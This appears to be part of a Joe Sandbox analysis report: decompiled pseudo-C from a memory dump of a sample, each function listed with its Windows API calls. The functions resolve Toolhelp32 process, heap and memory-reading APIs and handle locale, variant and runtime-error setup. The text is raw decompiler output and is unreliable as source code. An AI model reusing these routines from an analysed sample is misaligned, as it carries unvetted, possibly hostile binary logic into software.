    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00417A70() {
    
    				if( *0x454a18 == 0) {
    					 *0x454a18 = GetModuleHandleA("kernel32.dll");
    					if( *0x454a18 != 0) {
    						 *0x454a1c = GetProcAddress( *0x454a18, "CreateToolhelp32Snapshot");
    						 *0x454a20 = GetProcAddress( *0x454a18, "Heap32ListFirst");
    						 *0x454a24 = GetProcAddress( *0x454a18, "Heap32ListNext");
    						 *0x454a28 = GetProcAddress( *0x454a18, "Heap32First");
    						 *0x454a2c = GetProcAddress( *0x454a18, "Heap32Next");
    						 *0x454a30 = GetProcAddress( *0x454a18, "Toolhelp32ReadProcessMemory");
    						 *0x454a34 = GetProcAddress( *0x454a18, "Process32First");
    						 *0x454a38 = GetProcAddress( *0x454a18, "Process32Next");
    						 *0x454a3c = GetProcAddress( *0x454a18, "Process32FirstW");
    						 *0x454a40 = GetProcAddress( *0x454a18, "Process32NextW");
    						 *0x454a44 = GetProcAddress( *0x454a18, "Thread32First");
    						 *0x454a48 = GetProcAddress( *0x454a18, "Thread32Next");
    						 *0x454a4c = GetProcAddress( *0x454a18, "Module32First");
    						 *0x454a50 = GetProcAddress( *0x454a18, "Module32Next");
    						 *0x454a54 = GetProcAddress( *0x454a18, "Module32FirstW");
    						 *0x454a58 = GetProcAddress( *0x454a18, "Module32NextW");
    					}
    				}
    				if( *0x454a18 == 0 ||  *0x454a1c == 0) {
    					return 0;
    				} else {
    					return 1;
    				}
    			}




    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2,00000000,004183DD), ref: 00417A84
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2), ref: 00417A9C
    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AAE
    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AC0
    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AD2
    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7), ref: 00417AE4
    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000), ref: 00417AF6
    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00417B08
    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00417B1A
    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00417B2C
    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00417B3E
    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00417B50
    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00417B62
    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00417B74
    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00417B86
    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00417B98
    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00417BAA
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040CA40() {
    				struct HINSTANCE__* _v8;
    				intOrPtr _t46;
    				void* _t91;
    
    				_v8 = GetModuleHandleA("oleaut32.dll");
    				 *0x4547a0 = E0040CA14("VariantChangeTypeEx", E0040C5B0, _t91);
    				 *0x4547a4 = E0040CA14("VarNeg", E0040C5E0, _t91);
    				 *0x4547a8 = E0040CA14("VarNot", E0040C5E0, _t91);
    				 *0x4547ac = E0040CA14("VarAdd", E0040C5EC, _t91);
    				 *0x4547b0 = E0040CA14("VarSub", E0040C5EC, _t91);
    				 *0x4547b4 = E0040CA14("VarMul", E0040C5EC, _t91);
    				 *0x4547b8 = E0040CA14("VarDiv", E0040C5EC, _t91);
    				 *0x4547bc = E0040CA14("VarIdiv", E0040C5EC, _t91);
    				 *0x4547c0 = E0040CA14("VarMod", E0040C5EC, _t91);
    				 *0x4547c4 = E0040CA14("VarAnd", E0040C5EC, _t91);
    				 *0x4547c8 = E0040CA14("VarOr", E0040C5EC, _t91);
    				 *0x4547cc = E0040CA14("VarXor", E0040C5EC, _t91);
    				 *0x4547d0 = E0040CA14("VarCmp", E0040C5F8, _t91);
    				 *0x4547d4 = E0040CA14("VarI4FromStr", E0040C604, _t91);
    				 *0x4547d8 = E0040CA14("VarR4FromStr", E0040C670, _t91);
    				 *0x4547dc = E0040CA14("VarR8FromStr", E0040C6DC, _t91);
    				 *0x4547e0 = E0040CA14("VarDateFromStr", E0040C748, _t91);
    				 *0x4547e4 = E0040CA14("VarCyFromStr", E0040C7B4, _t91);
    				 *0x4547e8 = E0040CA14("VarBoolFromStr", E0040C820, _t91);
    				 *0x4547ec = E0040CA14("VarBstrFromCy", E0040C8A0, _t91);
    				 *0x4547f0 = E0040CA14("VarBstrFromDate", E0040C910, _t91);
    				_t46 = E0040CA14("VarBstrFromBool", E0040C980, _t91);
    				 *0x4547f4 = _t46;
    				return _t46;
    			}







    APIs
    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040CA49
      • Part of subcall function 0040CA14: GetProcAddress.KERNEL32(00000000), ref: 0040CA2D
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00402858(CHAR* __eax, intOrPtr* __edx) {
    				char _t5;
    				char _t6;
    				CHAR* _t7;
    				char _t9;
    				CHAR* _t11;
    				char _t14;
    				CHAR* _t15;
    				char _t17;
    				CHAR* _t19;
    				CHAR* _t22;
    				CHAR* _t23;
    				CHAR* _t32;
    				intOrPtr _t33;
    				intOrPtr* _t34;
    				void* _t35;
    				void* _t36;
    
    				_t34 = __edx;
    				_t22 = __eax;
    				while(1) {
    					L2:
    					_t5 =  *_t22;
    					if(_t5 != 0 && _t5 <= 0x20) {
    						_t22 = CharNextA(_t22);
    					}
    					L2:
    					_t5 =  *_t22;
    					if(_t5 != 0 && _t5 <= 0x20) {
    						_t22 = CharNextA(_t22);
    					}
    					L4:
    					if( *_t22 != 0x22 || _t22[1] != 0x22) {
    						_t36 = 0;
    						_t32 = _t22;
    						while(1) {
    							_t6 =  *_t22;
    							if(_t6 <= 0x20) {
    								break;
    							}
    							if(_t6 != 0x22) {
    								_t7 = CharNextA(_t22);
    								_t36 = _t36 + _t7 - _t22;
    								_t22 = _t7;
    								continue;
    							}
    							_t22 = CharNextA(_t22);
    							while(1) {
    								_t9 =  *_t22;
    								if(_t9 == 0 || _t9 == 0x22) {
    									break;
    								}
    								_t11 = CharNextA(_t22);
    								_t36 = _t36 + _t11 - _t22;
    								_t22 = _t11;
    							}
    							if( *_t22 != 0) {
    								_t22 = CharNextA(_t22);
    							}
    						}
    						E00404478(_t34, _t36);
    						_t23 = _t32;
    						_t33 =  *_t34;
    						_t35 = 0;
    						while(1) {
    							_t14 =  *_t23;
    							if(_t14 <= 0x20) {
    								break;
    							}
    							if(_t14 != 0x22) {
    								_t15 = CharNextA(_t23);
    								if(_t15 <= _t23) {
    									continue;
    								} else {
    									goto L27;
    								}
    								do {
    									L27:
    									 *((char*)(_t33 + _t35)) =  *_t23;
    									_t23 =  &(_t23[1]);
    									_t35 = _t35 + 1;
    								} while (_t15 > _t23);
    								continue;
    							}
    							_t23 = CharNextA(_t23);
    							while(1) {
    								_t17 =  *_t23;
    								if(_t17 == 0 || _t17 == 0x22) {
    									break;
    								}
    								_t19 = CharNextA(_t23);
    								if(_t19 <= _t23) {
    									continue;
    								} else {
    									goto L21;
    								}
    								do {
    									L21:
    									 *((char*)(_t33 + _t35)) =  *_t23;
    									_t23 =  &(_t23[1]);
    									_t35 = _t35 + 1;
    								} while (_t19 > _t23);
    							}
    							if( *_t23 != 0) {
    								_t23 = CharNextA(_t23);
    							}
    						}
    						return _t23;
    					} else {
    						_t22 =  &(_t22[2]);
    						continue;
    					}
    				}
    			}




















    APIs
    • CharNextA.USER32(00000000), ref: 00402863
    • CharNextA.USER32(00000000), ref: 0040288F
    • CharNextA.USER32(00000000), ref: 00402899
    • CharNextA.USER32(00000000), ref: 004028B6
    • CharNextA.USER32(00000000), ref: 004028C0
    • CharNextA.USER32(00000000), ref: 004028E9
    • CharNextA.USER32(00000000), ref: 004028F3
    • CharNextA.USER32(00000000), ref: 00402917
    • CharNextA.USER32(00000000), ref: 00402921
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A4A4(void* __edx, void* __edi, void* __fp0) {
    				void _v1024;
    				char _v1088;
    				long _v1092;
    				void* _t12;
    				char* _t14;
    				intOrPtr _t16;
    				intOrPtr _t18;
    				intOrPtr _t24;
    				long _t32;
    
    				E0040A31C(_t12,  &_v1024, __edx, __fp0, 0x400);
    				_t14 =  *0x45308c; // 0x454044
    				if( *_t14 == 0) {
    					_t16 =  *0x452f6c; // 0x405f30
    					_t9 = _t16 + 4; // 0xffe9
    					_t18 =  *0x454660; // 0x400000
    					LoadStringA(E00404DCC(_t18),  *_t9,  &_v1088, 0x40);
    					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
    				}
    				_t24 =  *0x452f90; // 0x454214
    				E00402784(E00402A8C(_t24));
    				CharToOemA( &_v1024,  &_v1024);
    				_t32 = E00407764( &_v1024, __edi);
    				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
    				return WriteFile(GetStdHandle(0xfffffff4), 0x40a568, 2,  &_v1092, 0);
    			}













    APIs
      • Part of subcall function 0040A31C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
      • Part of subcall function 0040A31C: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    • CharToOemA.USER32(?,?), ref: 0040A4DB
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040A4F8
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040A4FE
    • GetStdHandle.KERNEL32(000000F4,0040A568,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040A513
    • WriteFile.KERNEL32(00000000,000000F4,0040A568,00000002,?), ref: 0040A519
    • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 0040A53B
    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040A551
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00401A74() {
    				void* _t2;
    				void* _t3;
    				void* _t14;
    				intOrPtr* _t19;
    				intOrPtr _t23;
    				intOrPtr _t26;
    				intOrPtr _t28;
    
    				_t26 = _t28;
    				if( *0x4545bc == 0) {
    					return _t2;
    				} else {
    					_push(_t26);
    					_push(E00401B4A);
    					_push( *[fs:edx]);
    					 *[fs:edx] = _t28;
    					if( *0x454045 != 0) {
    						_push(0x4545c4);
    						L0040130C();
    					}
    					 *0x4545bc = 0;
    					_t3 =  *0x45461c; // 0x0
    					LocalFree(_t3);
    					 *0x45461c = 0;
    					_t19 =  *0x4545e4; // 0x4545e4
    					while(_t19 != 0x4545e4) {
    						_t1 = _t19 + 8; // 0x0
    						VirtualFree( *_t1, 0, 0x8000);
    						_t19 =  *_t19;
    					}
    					E00401374(0x4545e4);
    					E00401374(0x4545f4);
    					E00401374(0x454620);
    					_t14 =  *0x4545dc; // 0x0
    					while(_t14 != 0) {
    						 *0x4545dc =  *_t14;
    						LocalFree(_t14);
    						_t14 =  *0x4545dc; // 0x0
    					}
    					_pop(_t23);
    					 *[fs:eax] = _t23;
    					_push(0x401b51);
    					if( *0x454045 != 0) {
    						_push(0x4545c4);
    						L00401314();
    					}
    					_push(0x4545c4);
    					L0040131C();
    					return 0;
    				}
    			}











    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00401B4A), ref: 00401AA1
    • LocalFree.KERNEL32(00000000,00000000,00401B4A), ref: 00401AB3
    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401AD2
    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401B11
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B3A
    • RtlDeleteCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B44
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E0040B514(void* __ebx, void* __edx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				char _v48;
    				char _v52;
    				char _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				void* _t104;
    				void* _t111;
    				void* _t133;
    				intOrPtr _t183;
    				intOrPtr _t193;
    				intOrPtr _t194;
    
    				_t191 = __esi;
    				_t190 = __edi;
    				_t193 = _t194;
    				_t133 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t133 = _t133 - 1;
    				} while (_t133 != 0);
    				_push(__ebx);
    				_push(_t193);
    				_push(0x40b7df);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t194;
    				E0040B3A0();
    				E00409E60(__ebx, __edi, __esi);
    				_t196 =  *0x454744;
    				if( *0x454744 != 0) {
    					E0040A038(__esi, _t196);
    				}
    				_t132 = GetThreadLocale();
    				E00409DB0(_t43, 0, 0x14,  &_v20);
    				E00403EDC(0x454678, _v20);
    				E00409DB0(_t43, 0x40b7f4, 0x1b,  &_v24);
    				 *0x45467c = E00407174(0x40b7f4, 0, _t196);
    				E00409DB0(_t132, 0x40b7f4, 0x1c,  &_v28);
    				 *0x45467d = E00407174(0x40b7f4, 0, _t196);
    				 *0x45467e = E00409DFC(_t132, 0x2c, 0xf);
    				 *0x45467f = E00409DFC(_t132, 0x2e, 0xe);
    				E00409DB0(_t132, 0x40b7f4, 0x19,  &_v32);
    				 *0x454680 = E00407174(0x40b7f4, 0, _t196);
    				 *0x454681 = E00409DFC(_t132, 0x2f, 0x1d);
    				E00409DB0(_t132, "m/d/yy", 0x1f,  &_v40);
    				E0040A0E8(_v40, _t132,  &_v36, _t190, _t191, _t196);
    				E00403EDC(0x454684, _v36);
    				E00409DB0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
    				E0040A0E8(_v48, _t132,  &_v44, _t190, _t191, _t196);
    				E00403EDC(0x454688, _v44);
    				 *0x45468c = E00409DFC(_t132, 0x3a, 0x1e);
    				E00409DB0(_t132, 0x40b828, 0x28,  &_v52);
    				E00403EDC(0x454690, _v52);
    				E00409DB0(_t132, 0x40b834, 0x29,  &_v56);
    				E00403EDC(0x454694, _v56);
    				E00403E88( &_v12);
    				E00403E88( &_v16);
    				E00409DB0(_t132, 0x40b7f4, 0x25,  &_v60);
    				_t104 = E00407174(0x40b7f4, 0, _t196);
    				_t197 = _t104;
    				if(_t104 != 0) {
    					E00403F20( &_v8, 0x40b84c);
    				} else {
    					E00403F20( &_v8, 0x40b840);
    				}
    				E00409DB0(_t132, 0x40b7f4, 0x23,  &_v64);
    				_t111 = E00407174(0x40b7f4, 0, _t197);
    				_t198 = _t111;
    				if(_t111 == 0) {
    					E00409DB0(_t132, 0x40b7f4, 0x1005,  &_v68);
    					if(E00407174(0x40b7f4, 0, _t198) != 0) {
    						E00403F20( &_v12, 0x40b868);
    					} else {
    						E00403F20( &_v16, 0x40b858);
    					}
    				}
    				_push(_v12);
    				_push(_v8);
    				_push(":mm");
    				_push(_v16);
    				E00404208();
    				_push(_v12);
    				_push(_v8);
    				_push(":mm:ss");
    				_push(_v16);
    				E00404208();
    				 *0x454746 = E00409DFC(_t132, 0x2c, 0xc);
    				_pop(_t183);
    				 *[fs:eax] = _t183;
    				_push(E0040B7E6);
    				return E00403EAC( &_v68, 0x10);
    			}


























    APIs
      • Part of subcall function 0040B3A0: GetThreadLocale.KERNEL32 ref: 0040B3CA
      • Part of subcall function 0040B3A0: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 00409E60: GetThreadLocale.KERNEL32(00000000,00409F73,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E7C
    • GetThreadLocale.KERNEL32(00000000,0040B7DF,?,?,00000000,00000000), ref: 0040B54A
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
      • Part of subcall function 00409DFC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
      • Part of subcall function 0040A0E8: GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 77%
    			E0040DBC0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
    				char _v260;
    				char _v768;
    				char _v772;
    				short* _v776;
    				intOrPtr _v780;
    				char _v784;
    				signed int _v788;
    				signed short* _v792;
    				char _v796;
    				char _v800;
    				intOrPtr* _v804;
    				void* __ebp;
    				signed char _t47;
    				signed int _t54;
    				void* _t62;
    				intOrPtr* _t73;
    				intOrPtr* _t91;
    				void* _t93;
    				void* _t95;
    				void* _t98;
    				void* _t99;
    				intOrPtr* _t108;
    				void* _t112;
    				intOrPtr _t113;
    				char* _t114;
    				void* _t115;
    
    				_t100 = __ecx;
    				_v780 = __ecx;
    				_t91 = __edx;
    				_v776 = __eax;
    				if(( *(__edx + 1) & 0x00000020) == 0) {
    					E0040D7EC(0x80070057);
    				}
    				_t47 =  *_t91;
    				if((_t47 & 0x00000fff) != 0xc) {
    					_push(_t91);
    					_push(_v776);
    					L0040C5A0();
    					return E0040D7EC(_v776);
    				} else {
    					if((_t47 & 0x00000040) == 0) {
    						_v792 =  *((intOrPtr*)(_t91 + 8));
    					} else {
    						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
    					}
    					_v788 =  *_v792 & 0x0000ffff;
    					_t93 = _v788 - 1;
    					if(_t93 < 0) {
    						L9:
    						_push( &_v772);
    						_t54 = _v788;
    						_push(_t54);
    						_push(0xc);
    						L0040C9F4();
    						_t113 = _t54;
    						if(_t113 == 0) {
    							E0040D544(_t100);
    						}
    						E0040DB18(_v776);
    						 *_v776 = 0x200c;
    						 *((intOrPtr*)(_v776 + 8)) = _t113;
    						_t95 = _v788 - 1;
    						if(_t95 < 0) {
    							L14:
    							_t97 = _v788 - 1;
    							if(E0040DB34(_v788 - 1, _t115) != 0) {
    								L0040CA0C();
    								E0040D7EC(_v792);
    								L0040CA0C();
    								E0040D7EC( &_v260);
    								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
    							}
    							_t62 = E0040DB64(_t97, _t115);
    						} else {
    							_t98 = _t95 + 1;
    							_t73 =  &_v768;
    							_t108 =  &_v260;
    							do {
    								 *_t108 =  *_t73;
    								_t108 = _t108 + 4;
    								_t73 = _t73 + 8;
    								_t98 = _t98 - 1;
    							} while (_t98 != 0);
    							do {
    								goto L14;
    							} while (_t62 != 0);
    							return _t62;
    						}
    					} else {
    						_t99 = _t93 + 1;
    						_t112 = 0;
    						_t114 =  &_v772;
    						do {
    							_v804 = _t114;
    							_push(_v804 + 4);
    							_t18 = _t112 + 1; // 0x1
    							_push(_v792);
    							L0040C9FC();
    							E0040D7EC(_v792);
    							_push( &_v784);
    							_t21 = _t112 + 1; // 0x1
    							_push(_v792);
    							L0040CA04();
    							E0040D7EC(_v792);
    							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
    							_t112 = _t112 + 1;
    							_t114 = _t114 + 8;
    							_t99 = _t99 - 1;
    						} while (_t99 != 0);
    						goto L9;
    					}
    				}
    			}






























    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040DC59
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040DC75
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040DCAE
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DD2B
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040DD44
    • VariantCopy.OLEAUT32(?), ref: 0040DD79
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403C90(void* __ecx) {
    				long _v4;
    				int _t3;
    
    				if( *0x454044 == 0) {
    					if( *0x419030 == 0) {
    						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
    					}
    					return _t3;
    				} else {
    					if( *0x454218 == 0xd7b2 &&  *0x454220 > 0) {
    						 *0x454230();
    					}
    					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
    					return WriteFile(GetStdHandle(0xfffffff5), E00403D18, 2,  &_v4, 0);
    				}
    			}






    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
    • GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
    • WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040B9A0() {
    				struct HINSTANCE__** _t2;
    				void* _t3;
    				struct HINSTANCE__** _t5;
    				struct HRSRC__* _t7;
    				struct HINSTANCE__** _t8;
    				intOrPtr* _t11;
    				intOrPtr* _t12;
    				struct HINSTANCE__* _t13;
    
    				_t2 =  *0x452f9c; // 0x45402c
    				if( *_t2 != 0) {
    					_t5 =  *0x452f9c; // 0x45402c
    					_t7 = FindResourceA( *_t5, "DVCLAL", 0xa);
    					_t8 =  *0x452f9c; // 0x45402c
    					return LoadResource( *_t8, _t7);
    				}
    				_t3 = 0;
    				_t11 =  *0x4530b8; // 0x419034
    				_t12 =  *_t11;
    				if(_t12 != 0) {
    					while(1) {
    						_t13 =  *(_t12 + 4);
    						_t3 = LoadResource(_t13, FindResourceA(_t13, "DVCLAL", 0xa));
    						if(_t3 != 0) {
    							goto L5;
    						}
    						_t12 =  *_t12;
    						if(_t12 != 0) {
    							continue;
    						}
    						goto L5;
    					}
    				}
    				L5:
    				return _t3;
    			}












    APIs
    • FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
    • LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
    • FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
    • LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405945(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
    				long _t11;
    				void* _t16;
    
    				_t16 = __ebx;
    				 *__edi =  *__edi + __ecx;
    				 *((intOrPtr*)(__eax - 0x4545b4)) =  *((intOrPtr*)(__eax - 0x4545b4)) + __eax - 0x4545b4;
    				 *0x419008 = 2;
    				 *0x454014 = 0x4011a8;
    				 *0x454018 = 0x4011b0;
    				 *0x454046 = 2;
    				 *0x454000 = E00404B04;
    				if(E00402F5C() != 0) {
    					_t3 = E00402F8C();
    				}
    				E00403050(_t3);
    				 *0x45404c = 0xd7b0;
    				 *0x454218 = 0xd7b0;
    				 *0x4543e4 = 0xd7b0;
    				 *0x45403c = GetCommandLineA();
    				 *0x454038 = E004012C0();
    				if((GetVersion() & 0x80000000) == 0x80000000) {
    					 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
    				} else {
    					if((GetVersion() & 0x000000ff) <= 4) {
    						 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
    					} else {
    						 *0x4545b8 = 3;
    					}
    				}
    				_t11 = GetCurrentThreadId();
    				 *0x454030 = _t11;
    				return _t11;
    			}






    APIs
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000000), ref: 00402F61
